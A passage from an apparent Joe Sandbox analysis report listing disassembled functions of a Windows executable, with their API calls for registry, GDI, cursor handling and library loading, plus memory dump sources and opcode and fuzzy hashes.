                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                                                                      • API String ID: 47109696-2530820420
                                                                                                                                                                      • Opcode ID: 0b799592d44c4c587e58c5e8b4685bf75307bfb384e705f247317911871ab6d2
                                                                                                                                                                      • Instruction ID: b53b4caf4df369742718f420b864b5eadf64457ff5313130662490eff196aabe
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b799592d44c4c587e58c5e8b4685bf75307bfb384e705f247317911871ab6d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E115130704244AADB10FFA59852B5F7BA8DB55B05F6188B7A800A7282D7389E02871D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00494A14 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 7406A670.USER32(00000000,?,?,00000000), ref: 00494A25
                                                                                                                                                                        • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                                                                                                                                      • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                                                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                                                                                                                                      • 7406A580.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                                                                                                                                      Strings
                                                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 7406Text$A580A670CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                                                                      • API String ID: 2166775325-222967699
                                                                                                                                                                      • Opcode ID: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                                                                                                                      • Instruction ID: 4a1d9e00790e4e8279befe01d539e981fbc0a950f87c09723c3c89301347e02c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                                                                                                                      • Instruction Fuzzy Hash: FA015E76A44604AFDB14DBA9CC41E5EB7ECDB48704F610476B604E7281DA78AE008B6C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041B45A Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSelect$Delete$Stretch
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1458357782-0
                                                                                                                                                                      • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                                                                                      • Instruction ID: d121cbdfe682723b668f1aba97a5ca8eb2ba63952d9ca8216d3140e682204302
                                                                                                                                                                      • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                                                                                      • Instruction Fuzzy Hash: 46115C72E00619ABDB10DAD9DD85FEFB7BCEF08704F144555B614F7281C678AC418BA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042338C Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCursorPos.USER32 ref: 004233A7
                                                                                                                                                                      • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                                                                                                                                      • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                                                                                                                                      • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0042340B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1770779139-0
                                                                                                                                                                      • Opcode ID: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                                                                                                                      • Instruction ID: 5b5036a29de233914ad27f5bfe0a39b591155b03ca34aa4f0141610fd726b6de
                                                                                                                                                                      • Opcode Fuzzy Hash: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                                                                                                                      • Instruction Fuzzy Hash: 3501D4323046102AD6217B755C82E2F26E8DB85B29F60447FF504BB287DA3DAD11936D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00494838 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                      • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                                                                      • API String ID: 667068680-2254406584
                                                                                                                                                                      • Opcode ID: a66a3fa64be10057d84111b6ed6f5a4b5d3f10f1175607d61eb54ac6e70aba56
                                                                                                                                                                      • Instruction ID: 57979f0f623c6713f86cfc51a9e85cc39870524a60e3ac3170e58067450f8277
                                                                                                                                                                      • Opcode Fuzzy Hash: a66a3fa64be10057d84111b6ed6f5a4b5d3f10f1175607d61eb54ac6e70aba56
                                                                                                                                                                      • Instruction Fuzzy Hash: 68F0F69AB01F5526DA20B5A69C42E7B6ACCCBC17A4F150137FD04B73C2E99C8C0242FD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045CFA8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ISCryptGetVersion), ref: 0045CFB1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ArcFourInit), ref: 0045CFC1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ArcFourCrypt), ref: 0045CFD1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                                                      • API String ID: 190572456-508647305
                                                                                                                                                                      • Opcode ID: 9c5ea2120aef4d7575303e94616d7d0041242676d6759231394ac55fc3d10741
                                                                                                                                                                      • Instruction ID: aa10fef992bac70bb4986ae7772dd6d371a0f40a2d4a4027d6f3d37c18d15e1e
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c5ea2120aef4d7575303e94616d7d0041242676d6759231394ac55fc3d10741
                                                                                                                                                                      • Instruction Fuzzy Hash: A1F0F9B0940700DBE728EFB6ACC67267795EBE570AF54813BA409911A2D7784499CB1C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045D4A8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                                                                      • API String ID: 190572456-212574377
                                                                                                                                                                      • Opcode ID: 9335f7af2211021c4579a400e0dceecb47e0403288ea1c37c1c388864c21f3cc
                                                                                                                                                                      • Instruction ID: 50a43070f27201e9cf87661d87b97551d06431c7276cd5b4b6d770057bc484c9
                                                                                                                                                                      • Opcode Fuzzy Hash: 9335f7af2211021c4579a400e0dceecb47e0403288ea1c37c1c388864c21f3cc
                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0B2B0D00701DAE724DFB65CC77263A959B6431AF1084379A4D55373D67814498F2D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0044C7D4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                      • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                                                                      • API String ID: 2238633743-1050967733
                                                                                                                                                                      • Opcode ID: b1b9c4bcaf35f09e527c41f38d727e81cd73aa79bcd67d13a7c3cccc2fd7d75b
                                                                                                                                                                      • Instruction ID: ee0778b55076bf214b63aaf44073c79067fceb62e20c2f516a440ec7c4faf5ed
                                                                                                                                                                      • Opcode Fuzzy Hash: b1b9c4bcaf35f09e527c41f38d727e81cd73aa79bcd67d13a7c3cccc2fd7d75b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2FF0FE70242302CAF750ABB5FDD97563694E7E471AF14237BE401551A1D7BD4444CB8C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004786B4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                      • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                                                                      • API String ID: 667068680-222143506
                                                                                                                                                                      • Opcode ID: 45d18bd6c87fe0956c69554b1a81fc384be0f40df191d0dc253570492b599bc3
                                                                                                                                                                      • Instruction ID: 2026d18a05cb2035c6a6e54b58e3f317de058d113ce64fa581f90165bcddcee3
                                                                                                                                                                      • Opcode Fuzzy Hash: 45d18bd6c87fe0956c69554b1a81fc384be0f40df191d0dc253570492b599bc3
                                                                                                                                                                      • Instruction Fuzzy Hash: F5C0E9F06C1701EA9640B7F15CDAD7A2558D520729720943F755EA6192D9BC4C104A6C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041B664 Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFocus.USER32 ref: 0041B73D
                                                                                                                                                                      • 7406A670.USER32(?), ref: 0041B749
                                                                                                                                                                      • 74068900.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                                                                                                                                      • 74062350.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                                                                                                                                      • 74076410.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                                                                                                                                      • 74068900.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 74068900$74067406235074076410A670Focus
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1888466951-0
                                                                                                                                                                      • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                                                                                                                      • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                                                                                                                                      • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                                                                                                                      • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041B934 Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFocus.USER32 ref: 0041BA0F
                                                                                                                                                                      • 7406A670.USER32(?), ref: 0041BA1B
                                                                                                                                                                      • 74068900.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                                                                                                                                      • 74062350.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                                                                                                                                      • 74076410.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                                                                                                                                      • 74068900.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 74068900$74067406235074076410A670Focus
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1888466951-0
                                                                                                                                                                      • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                                                                                                                      • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                                                                                                                                      • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                                                                                                                      • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041B500 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFocus.USER32 ref: 0041B576
                                                                                                                                                                      • 7406A670.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                                                                                                                                      • 74074720.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                                                                                                                                      • 7409F4A0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                                                                                                                                      • 7409F4A0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                                                                                                                                      • 7406A580.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 74067409$74074720A580A670Focus
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3431917407-0
                                                                                                                                                                      • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                                                                                                                      • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                                                                                                                                      • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                                                                                                                      • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045CE6C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
